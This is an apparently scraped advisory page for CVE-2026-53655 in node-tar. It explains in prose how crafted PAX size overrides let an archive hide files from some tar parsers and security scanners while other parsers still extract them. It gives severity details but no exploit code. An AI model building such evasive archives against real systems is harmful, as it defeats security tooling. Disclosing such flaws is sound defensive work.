Vulnerability in node-tar Affects Tar Archive Processing
CVE-2026-53655

6.9MEDIUM

Key Information:

Vendor

Isaacs

Status
Node-tar
Vendor
CVE Published:
22 June 2026

What is CVE-2026-53655?

The vulnerability in node-tar (prior to version 7.5.16) arises from improper handling of PAX extended headers in tar archives. Specifically, the tar implementation allows a PAX size override that can misinterpret intermediary metadata headers, such as long-name or long-link entries. This misalignment creates discrepancies in how different tar parsers interpret crafted archives, leading to varying visibility of archive entries. An attacker can exploit this to hide files from certain parsers while they remain accessible to others, undermining the reliability of security tools that process these archives. As a result, discrepancies in file visibility between different extraction processes pose a significant security risk, highlighting the importance of using the updated version to mitigate this vulnerability.

Affected Version(s)

node-tar < 7.5.16

References

https://github.com/isaacs/node-tar/security/advisories/GH...
x_refsource_CONFIRM

CVSS V4

Score:
6.9
Severity:
MEDIUM
Confidentiality:
None
Integrity:
High
Availability:
None
Attack Vector:
Local
Attack Complexity:
Low
Attack Required:
None
Privileges Required:
Undefined
User Interaction:
None

Timeline

  • Vulnerability published

  • Vulnerability Reserved

.